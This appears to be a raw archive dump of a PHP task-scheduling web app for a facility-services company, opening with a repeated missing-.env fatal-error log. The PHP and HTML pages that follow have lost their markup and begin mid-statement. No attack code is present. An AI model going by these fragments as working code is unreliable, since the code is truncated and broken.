/home/emeraadmin/public_html/Service/TaskService.php(12): Database->__construct() #3 /home/emeraadmin/public_html/pages/taskprovider/delete_task.php(7): TaskService->__construct() #4 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [17-Apr-2026 09:19:25 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/Classes/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/Classes/Database.php(23): Dotenv\Dotenv->load() #2 /home/emeraadmin/public_html/Service/TaskService.php(12): Database->__construct() #3 /home/emeraadmin/public_html/pages/taskprovider/delete_task.php(7): TaskService->__construct() #4 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [17-Apr-2026 09:20:12 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/Classes/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/Classes/Database.php(23): Dotenv\Dotenv->load() #2 /home/emeraadmin/public_html/Service/TaskService.php(12): Database->__construct() #3 /home/emeraadmin/public_html/pages/taskprovider/delete_task.php(7): TaskService->__construct() #4 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [17-Apr-2026 10:19:06 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/Classes/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/Classes/Database.php(23): Dotenv\Dotenv->load() #2 /home/emeraadmin/public_html/Service/ServiceService.php(12): Database->__construct() #3 /home/emeraadmin/public_html/pages/taskprovider/add_tasks.php(15): ServiceService->__construct() #4 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [17-Apr-2026 10:29:01 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/Classes/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/Classes/Database.php(23): Dotenv\Dotenv->load() #2 /home/emeraadmin/public_html/Service/TaskService.php(12): Database->__construct() #3 /home/emeraadmin/public_html/pages/taskprovider/delete_task.php(7): TaskService->__construct() #4 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [17-Apr-2026 10:46:58 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/Classes/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/Classes/Database.php(23): Dotenv\Dotenv->load() #2 /home/emeraadmin/public_html/Service/ServiceService.php(12): Database->__construct() #3 /home/emeraadmin/public_html/pages/taskprovider/add_tasks.php(15): ServiceService->__construct() #4 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [17-Apr-2026 10:53:03 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/Classes/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/Classes/Database.php(23): Dotenv\Dotenv->load() #2 /home/emeraadmin/public_html/Service/ServiceService.php(12): Database->__construct() #3 /home/emeraadmin/public_html/pages/taskprovider/add_tasks.php(15): ServiceService->__construct() #4 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [17-Apr-2026 10:56:46 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/Classes/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/Classes/Database.php(23): Dotenv\Dotenv->load() #2 /home/emeraadmin/public_html/Service/TaskService.php(12): Database->__construct() #3 /home/emeraadmin/public_html/pages/taskprovider/delete_task.php(7): TaskService->__construct() #4 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [17-Apr-2026 11:02:18 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/Classes/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/Classes/Database.php(23): Dotenv\Dotenv->load() #2 /home/emeraadmin/public_html/Service/TaskService.php(12): Database->__construct() #3 /home/emeraadmin/public_html/pages/taskprovider/delete_task.php(7): TaskService->__construct() #4 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [17-Apr-2026 12:49:16 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/Classes/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/Classes/Database.php(23): Dotenv\Dotenv->load() #2 /home/emeraadmin/public_html/Service/SubtaskService.php(12): Database->__construct() #3 /home/emeraadmin/public_html/pages/taskprovider/delete_subtask.php(6): SubtaskService->__construct() #4 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [17-Apr-2026 12:50:08 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/Classes/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/Classes/Database.php(23): Dotenv\Dotenv->load() #2 /home/emeraadmin/public_html/Service/TaskService.php(12): Database->__construct() #3 /home/emeraadmin/public_html/pages/taskprovider/delete_task.php(7): TaskService->__construct() #4 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [17-Apr-2026 13:13:47 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/Classes/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/Classes/Database.php(23): Dotenv\Dotenv->load() #2 /home/emeraadmin/public_html/Service/ServiceService.php(12): Database->__construct() #3 /home/emeraadmin/public_html/pages/taskprovider/add_tasks.php(15): ServiceService->__construct() #4 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [17-Apr-2026 13:28:03 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/Classes/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/Classes/Database.php(23): Dotenv\Dotenv->load() #2 /home/emeraadmin/public_html/Service/TaskService.php(12): Database->__construct() #3 /home/emeraadmin/public_html/pages/taskprovider/delete_task.php(7): TaskService->__construct() #4 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [19-Apr-2026 05:44:57 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/Classes/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/Classes/Database.php(23): Dotenv\Dotenv->load() #2 /home/emeraadmin/public_html/Service/ServiceService.php(12): Database->__construct() #3 /home/emeraadmin/public_html/pages/taskprovider/add_tasks.php(15): ServiceService->__construct() #4 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [23-Apr-2026 08:05:13 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/Classes/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/Classes/Database.php(23): Dotenv\Dotenv->load() #2 /home/emeraadmin/public_html/Service/ServiceService.php(12): Database->__construct() #3 /home/emeraadmin/public_html/pages/taskprovider/add_tasks.php(15): ServiceService->__construct() #4 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [23-Apr-2026 20:41:20 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/Classes/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/Classes/Database.php(23): Dotenv\Dotenv->load() #2 /home/emeraadmin/public_html/Service/SubtaskService.php(12): Database->__construct() #3 /home/emeraadmin/public_html/pages/taskprovider/delete_subtask.php(6): SubtaskService->__construct() #4 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [24-Apr-2026 17:14:46 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/Classes/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/Classes/Database.php(23): Dotenv\Dotenv->load() #2 /home/emeraadmin/public_html/Service/TaskService.php(12): Database->__construct() #3 /home/emeraadmin/public_html/pages/taskprovider/delete_task.php(7): TaskService->__construct() #4 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [24-Apr-2026 18:54:27 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/Classes/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/Classes/Database.php(23): Dotenv\Dotenv->load() #2 /home/emeraadmin/public_html/Service/ScheduleService.php(13): Database->__construct() #3 /home/emeraadmin/public_html/pages/taskprovider/delete_schedule.php(7): ScheduleService->__construct() #4 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [27-Apr-2026 03:20:51 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/Classes/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/Classes/Database.php(23): Dotenv\Dotenv->load() #2 /home/emeraadmin/public_html/Service/SubtaskService.php(12): Database->__construct() #3 /home/emeraadmin/public_html/pages/taskprovider/delete_subtask.php(6): SubtaskService->__construct() #4 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 taskprovider/add_subtask.php000064400000002236151676701240012272 0ustar00format('Y-m-d H:i:s'); $updated_at = $now->format('Y-m-d H:i:s'); // Create a new Subtask object $subtask = new Subtask('', $task_id, $service_id, $subtask_date, $subtask_time,$created_at,$updated_at,0,"",0,"","",""); // Instantiate SubtaskService $subtaskService = new SubtaskService(); // Replace with your SubtaskService class instantiation // Attempt to add the subtask if ($subtaskService->addSubtask($subtask)) { echo "Subtask added successfully!"; } else { echo "Failed to add subtask."; } } else { echo "Invalid request method."; } ?> taskprovider/uploadSchedule.php000064400000016126151676701240012752 0ustar00

Upload Schedules

Drag and drop your file here, or click to select it.

Uploading...

taskprovider/navbar.php000064400000010126151676701240011254 0ustar00taskprovider/delete_schedule.php000064400000001234151676701240013121 0ustar00decryptData($_POST['scheduleId']); if (!$scheduleId) { echo "Invalid Schedule ID"; exit; } $deleteResult = $scheduleService->deleteScheduleWithTasks($scheduleId); if ($deleteResult) { echo "success"; } else { echo $deleteResult; } } else { echo "Schedule ID is missing"; } ?> taskprovider/viewtask.php000064400000100416151676701240011642 0ustar00decryptData($_GET['id']); // show error if the provided id is not valid with Swal alert if (!$taskId) { echo ''; } $task = $taskService->getTaskById($taskId); // show error if the task is not found with Swal alert if (!$task) { exit(); } } else { echo '

No task ID provided.

'; } $subtasks = $taskService->getSubtasksByTaskId($taskId); $subtaskDates= ''; for ($i = 0; $i < count($subtasks); $i++) { $subtaskDates .= '"' . $subtasks[$i]->subtask_date . '"'; if ($i < count($subtasks) - 1) { $subtaskDates .= ','; } } ?>

service_name; ?>

region; ?>
schedule_name; ?>
frequency; ?>
dates is a JSON string $datesJson = $task->dates; // Decode the JSON string to an array $datesArray = json_decode($datesJson, true); // Extract the dates and format them for JavaScript $formattedDates = array_map(function ($dateEntry) { return '"' . $dateEntry['date'] . '"'; }, $datesArray); $jsDates = implode(",", $formattedDates); // Convert the array to a comma-separated string ?>

Subtasks

is_assigned == 0 ){ echo ''; } ?>
Id Date Time Completed Actions
ST-000id; ?> subtask_date; ?> subtask_time? $date = date("g:i A", strtotime($subtask->subtask_time)) : ''; ?> ignored) { echo 'Ignored'; } else { echo $subtask->completed ? 'Completed' : 'Not Completed'; } ?> View assigned == 0 && $task->is_assigned == 0) { echo ''; } ?>
No subtasks found for this task.

'; } ?>
taskprovider/scripts.php000064400000006267151676701240011505 0ustar00 taskprovider/addtasks.php000064400000033325151676701240011607 0ustar00 getAllServicesForDropdown(); ?>

Add Tasks

Click the add button to repeat the form

taskprovider/sidebar.php000064400000006225151676701240011421 0ustar00
taskprovider/viewservices.php000064400000024772151676701240012535 0ustar00getAllServices(); ?>
Name Region Actions
name; ?> region; ?> View
taskprovider/submit_schedule.php000064400000001346151676701240013166 0ustar00addSchedule($schedule)) { echo "Schedule added successfully!"; } else { echo "Failed to add schedule."; } } else { echo "Invalid request method."; } ?> taskprovider/header.php000064400000016314151676701240011240 0ustar00
-->
taskprovider/submit_task.php000064400000001716151676701240012335 0ustar00addTask($task)) { echo "Task added successfully!"; } else { echo "Failed to add task."; } } else { echo "Invalid request method."; } ?> taskprovider/submit_service.php000064400000002567151676701240013040 0ustar00addService($service)) { echo "Service added successfully!"; } else { echo "Failed to add service."; } } else { echo "Invalid request method."; } ?> taskprovider/reports.php000064400000013115151676701240011502 0ustar00
taskprovider/viewschedules.php000064400000032415151676701240012662 0ustar00getAllSchedules($filters); ?>

Filter Schedules

Clear Filters
ID Schedule Name Created By Created At Actions
id; ?> schedule_name; ?> created_by; ?> created_at)); ?> View Tasks   hasAssignedTasks($schedule->id)): ?> encryptData($schedule->id); ?> hasSubmittedSubTasks($schedule->id)): ?>
taskprovider/delete_subtask.php000064400000001021151676701240012773 0ustar00deleteSubtaskById($subtaskId)) { echo 'success'; } else { echo 'error'; } } else { echo 'invalid_request'; } ?> taskprovider/viewscheduletasks.php000064400000075023151676701240013547 0ustar00 getAllServicesForDropdown(); // Create TaskService instance $taskService = new TaskService(); $System = new System(); $schedule_id = $System->decryptData($_GET['id']); // show error if the provided id is not valid with Swal alert if (!$schedule_id) { echo ""; exit; } // Fetch tasks from the database that belong to the given schedule $tasks = $taskService->getTasksByScheduleId($schedule_id); ?>

View Tasks

ID Service Name Region Frequency Created By Created At Finished Assigned Public Status Actions
id; ?> service_name; ?> region; ?> frequency; ?> created_by_name; ?> created_at)); ?> finished ? '' : ''); ?> is_assigned ? '' : ''); ?> isPublic ? '' : ''); ?> View Details is_assigned == 0): ?>
taskprovider/dashboard.php000064400000036535151676701240011746 0ustar00getPendingTasks($companyId); //$completedTasks =$reportsAndDashboardService->getCompletedTasks($companyId); // //$ongoingSubtasks = $reportsAndDashboardService->getOngoingSubtasks($companyId); //$unassignedSubtasks = $reportsAndDashboardService->getUnassignedSubtasks($companyId); // $subtasks = $reportsAndDashboardService->getSubtasks(); $taskProviderId = $_SESSION['user_id']; //Tasks added by me $tasksAddedByMe = $reportsAndDashboardService->getTasksAddedByMe($taskProviderId); //Service Locations $services = $reportsAndDashboardService->getServicesCount(); // Fetch completed and incomplete subtask summary data $subtasksSummary = $reportsAndDashboardService->getSubtasksSummaryAdmin(); $completedSubTasks = $subtasksSummary['completed']; $incompleteSubTasks = $subtasksSummary['incomplete']; $ongoingSubTasks = $completedSubTasks + $incompleteSubTasks; // Calculating ongoing subtasks // Fetch total finished and not finished task summary data $taskSummary = $reportsAndDashboardService->getTasksSummaryAdmin(); $completedTasks = $taskSummary['completed']; $pendingTasks = $taskSummary['pending']; $ongoingTasks = $taskSummary['total']; $todaySubtasksSummary = $reportsAndDashboardService->getSubtasksSummaryForTodayAdmin(date('Y-m-d')); $todayTotalSubTasks = $todaySubtasksSummary['total']; $todayCompletedSubTasks = $todaySubtasksSummary['completed']; $todayIncompleteSubTasks = $todaySubtasksSummary['incomplete']; ?>

Overall Subtasks Summary

Ongoing Subtasks

Completed Subtasks

Incomplete Subtasks

Today's Subtasks Summary:

Total Subtasks to be Completed

Completed Subtasks

Incomplete Subtasks

Tasks Added By Me

Services

count; ?>

Completed Subtasks

taskprovider/report_tasksstatusbyschedule.php000064400000033444151676701240016047 0ustar00getAllServicesForDropdown(); // Fetch all schedules for the dropdown $schedules = $taskService->getAllSchedules(); //get schedule id form the url $schedule_id = isset($_GET['schedule_id']) ? $_GET['schedule_id'] : null; // Handle form submission and fetch tasks based on the selected schedule $selectedScheduleId = $System->decryptData($schedule_id); $tasksBySchedule = []; if ($selectedScheduleId) { $tasksBySchedule = $taskService->getTasksBySchedule($selectedScheduleId); } ?>
ID Service Name Region Status Finished Actions
id); ?> service_name); ?> region); ?> is_assigned && $task->accepted ? '' : ''; ?> finished ? '' : ''); ?> View
taskprovider/report_viewsubtasksdaywise.php000064400000035656151676701240015535 0ustar00getAllServicesForDropdown(); // Fetch assigned user ID from session or request $assignedUserId = $_SESSION['user_id'] ?? ($_GET['user_id'] ?? 1); // Default to 1 if not set // Create TaskService instance $taskService = new TaskService(); $System = new System(); // Assuming System class is correctly defined and used $TaskProviderId = $_SESSION['user_id']; // Fetch all subtasks grouped by date $startDate = $_GET['start_date'] ?? null; $endDate = $_GET['end_date'] ?? null; $serviceLocationId = $_GET['service_location_id'] ?? null; if ($_GET['filter_today'] ?? false) { $startDate = date('Y-m-d'); $endDate = date('Y-m-d'); } // Correctly call the function with the right parameters //$subtasks = $taskService->getAllSubtasksForTaskProviderGroupByDate($startDate, $endDate, $serviceLocationId, $TaskProviderId); $subtasks = $taskService->getAllSubtasksGroupByDate($startDate, $endDate, $serviceLocationId); $CompletedSubtaskcount = 0; $IncompletedSubtaskcount = 0; foreach ($subtasks as $date => $subtaskList) { foreach ($subtaskList as $subtask) { if ($subtask['completed']) { $CompletedSubtaskcount++; } else { $IncompletedSubtaskcount++; } } } ?>
>
   
$subtaskList) { ?>

Subtasks for

ID Service Name Date Time Assigned Completed Actions
ST-000 Assigned' : 'Not Assigned'; ?> Ignored'; } else { echo $subtask['completed'] ? 'Completed' : 'Not Completed'; } ?> View
taskprovider/head.php000064400000007664151676701240010721 0ustar00isLoggedIn() || !$system->isTaskProvider()) { header('Location: ../login.php'); exit; // Stop further execution } $companyId = $_SESSION['user_id']; ?> <?php echo isset($pageTitle) ? $pageTitle : "Emera Facility Services"; ?>
taskprovider/add_tasks.php000064400000006237151676701240011750 0ustar00getAllServicesForDropdown(); if ($_SERVER['REQUEST_METHOD'] === 'POST') { // Read the raw POST data $input = file_get_contents('php://input'); $data = json_decode($input, true); // Decode the JSON data into an associative array // Extract schedule name and tasks $scheduleName = isset($data['scheduleName']) ? trim($data['scheduleName']) : ''; $currentUserId = isset($data['currentUserId']) ? trim($data['currentUserId']) : ''; $tasks = isset($data['tasks']) ? $data['tasks'] : []; $now = date('Y-m-d H:i:s'); try { // Create a new schedule $schedule = new Schedules('', $scheduleName, $currentUserId, false, $now, $now); $scheduleService = new ScheduleService(); $schedule_id = $scheduleService->addScheduleRetuenlastinsertedid($schedule); // Check if schedule creation was successful if (!$schedule_id) { echo json_encode(array('error' => 'Failed to add schedule.')); exit; } // Loop through tasks array and add each task foreach ($tasks as $taskData) { $serviceId = isset($taskData['service']) ? trim($taskData['service']) : ''; $frequency = isset($taskData['frequency']) ? trim($taskData['frequency']) : ''; $dates = isset($taskData['dates']) ? $taskData['dates'] : []; // Validate and format dates and times $formattedDates = []; foreach ($dates as $date) { $formattedDates[] = [ 'date' => $date['date'], 'time' => $date['time'] ]; } // Create a new task instance with the formatted dates and times $task = new Task('', $schedule_id, $serviceId, $frequency, json_encode($formattedDates), $currentUserId, $currentUserId, $now, $now, false, null, false, false, false, '', null,0); $taskService = new TaskService(); $task_id = $taskService->addTask($task); // Check if task creation was successful if (!$task_id) { echo json_encode(array('error' => 'Failed to add task.')); exit; } } // If everything is successful, return a success response echo json_encode(array('success' => true, 'message' => 'Tasks added successfully.', 'schedule_id' => $schedule_id)); } catch (Exception $e) { // Handle any exceptions and return an error response echo json_encode(array('error' => $e->getMessage())); } } else { // If the request method is not POST, return an error response echo json_encode(array('error' => 'Invalid request method.')); } ?> taskprovider/viewsubtask.php000064400000033201151676701240012351 0ustar00 No subtask ID provided.

'; exit; } $subtaskId = $System->decryptData($_GET['id']); // show error if the provided id is not valid with Swal alert if (!$subtaskId) { echo ''; exit; } $subtask = $subtaskService->getSubtaskById($subtaskId); $users = $userService->getAllUsers(); if($subtask->completed){ $submittedLocation = $subtaskService->getSubtaskLocation($subtaskId); if ($submittedLocation) { $latitude = $submittedLocation->latitude; $longitude = $submittedLocation->longitude; } else { // Handle the case where location is not found $latitude = null; $longitude = null; // Optionally, display an error message or take other actions echo "Location not found for the specified subtask."; } } ?>

service_name; ?>

subtask_date ? date('F j, Y', strtotime($subtask->subtask_date)) : 'Not set'; ?>
subtask_time ? date('g:i A', strtotime($subtask->subtask_time)) : 'Not set'; ?>
updated_at)); ?>
completed): ?> completed_at; ?>assigned): ?> completed && property_exists($subtask, 'submitted_by_admin') && $subtask->submitted_by_admin): ?> form_submission_id): ?> completed_at contains the datetime string $completedAt = $subtask->completed_at; // Create a new DateTime object with the original datetime $date = new DateTime($completedAt, new DateTimeZone('UTC')); // Set the timezone to Sydney $date->setTimezone(new DateTimeZone('Australia/Sydney')); // Format the date and time $formattedDate = $date->format('F j, Y, g:i a'); ?>
ignored) { echo 'Ignored'; } else { if ($subtask->completed) { echo 'Completed '; } else { echo 'Not Completed'; } } ?>
assigned): ?> Assigned Not assigned
form_submission_id ? 'View Submitted Form' : 'Not Submitted'; ?>
Marked as completed by admin
completed && $latitude !== null && $longitude !== null): ?>

Submitted Location

taskprovider/viewservice.php000064400000023641151676701240012344 0ustar00 No service ID provided.

'; exit; } $serviceId = $System->decryptData($_GET['id']); // show error if the provided id is not valid with Swal alert if (!$serviceId) { echo ''; exit; } $service = $serviceService->getServiceById($serviceId); if (!$service) { echo '

Service not found.

'; exit; } $latitude = $service->latitude; $longitude = $service->longitude; ?>

General Information

name?: 'Name not provided'; ?>

region; ?>

Address Details

address_line1 ?: 'Address Line 1 not provided'; ?>
address_line2 ?: 'Address Line 2 not provided'; ?>
suburb ?: 'Suburb not provided'; ?>
city?: 'City not provided'; ?>
state ?: 'State not provided'; ?>
postal_code ?: 'Postal code not provided'; ?>
country?: 'Country not provided'; ?>
phone?: 'Phone not provided'; ?>

On Site Location

on_site_location ?: 'Not provided'; ?>

Longitude and Latitude

latitude ?: 'Not provided'; ?>
longitude ?: 'Not provided'; ?>

Timestamps

created_at)); ?>
updated_at)); ?>
taskprovider/footer.php000064400000000413151676701240011277 0ustar00
taskprovider/delete_task.php000064400000001574151676701240012276 0ustar00decryptData($taskId); error_log("Task ID received: " . $taskId); // Check the received task ID error_log("Decrypted Task ID: " . $decryptedtaskId); // Check the decrypted task ID if (!$taskId) { echo "Invalid Task ID"; exit; } // Call deleteTaskWithSubtasks method from TaskService $deleteResult = $taskService->deleteTaskWithSubtasks($decryptedtaskId); if ($deleteResult === true) { echo "success"; } else { echo "error"; } } else { echo "Task ID is missing"; } ?> taskprovider/report_alltasks.php000064400000023214151676701240013216 0ustar00getAllTasksByTaskProvider($companyId,$filters); ?>

Search Tasks

Clear Filters

View Tasks

# Service Name Region Frequency Finished Assigned Actions
id); ?> service_name); ?> region); ?> frequency); ?> finished ? '' : ''); ?> is_assigned ? '' : ''); ?> View Details
No tasks found.
taskprovider/report_subtaskswithnotes.php000064400000017540151676701240015211 0ustar00getAllSubtasksWithNotesGroupByDateForTeamKidsAdmin($startDate, $endDate, $serviceLocationId); ?>
 
$subtaskList) { ?>

Subtasks for

ID Service Name Date Time Notes Actions
ST- View
forgot-password.html000064400000014633151676701240010612 0ustar00 Login | ThemeKit - Admin Template
Emera Logo

Enter your email to reset your password

Remembered? Sign In

send_task_email_to_workers.php000064400000014440151676701240012671 0ustar00load(); // Set base URL $base_url = $_ENV['BASE_URL']; // Include necessary files require_once 'emailUtils.php'; // Ensure this file contains your sendEmail function require_once '../Service/TaskService.php'; // Adjust path as per your project structure use PHPMailer\PHPMailer\Exception; use PHPMailer\PHPMailer\PHPMailer; use PHPMailer\PHPMailer\SMTP; // Check if the request method is POST if ($_SERVER['REQUEST_METHOD'] === 'POST') { $data = json_decode(file_get_contents("php://input"), true); // Extract action, email, and task IDs from the decoded data $action = $data['action'] ?? null; $email = $data['worker_email'] ?? null; $taskIds = $data['task_ids'] ?? []; $taskService = new TaskService(); $errors = []; $successes = []; if ($action === 'bulk') { $emailContent = ''; // Initialize variable to accumulate email content foreach ($taskIds as $taskId) { $task = $taskService->getTaskById($taskId); if ($task) { $taskDates = json_decode($task->dates, true); $taskStartDate = $taskDates[0]['date']; $taskEndDate = $taskDates[count($taskDates) - 1]['date']; // Construct task-specific content $taskContent = "

Service Location: {$task->service_name}

Dates: " . date('d/m/Y', strtotime($taskStartDate)) . " to " . date('d/m/Y', strtotime($taskEndDate)) . "

Frequency: {$task->frequency}

Fill out the form

"; $emailContent .= $taskContent; // Append task content to accumulated email content // Update task status in the database $updateResult = $taskService->updateTaskStatusAfterMessage($taskId, $email); if (!$updateResult) { $errors[] = "Failed to update database for task ID $taskId"; } } else { $errors[] = "Task not found for ID $taskId"; } } if (empty($errors)) { $emailTemplate = " Service Confirmation Request
Company Logo

Dear {$email},

Please find the attached details for the upcoming services:

{$emailContent}
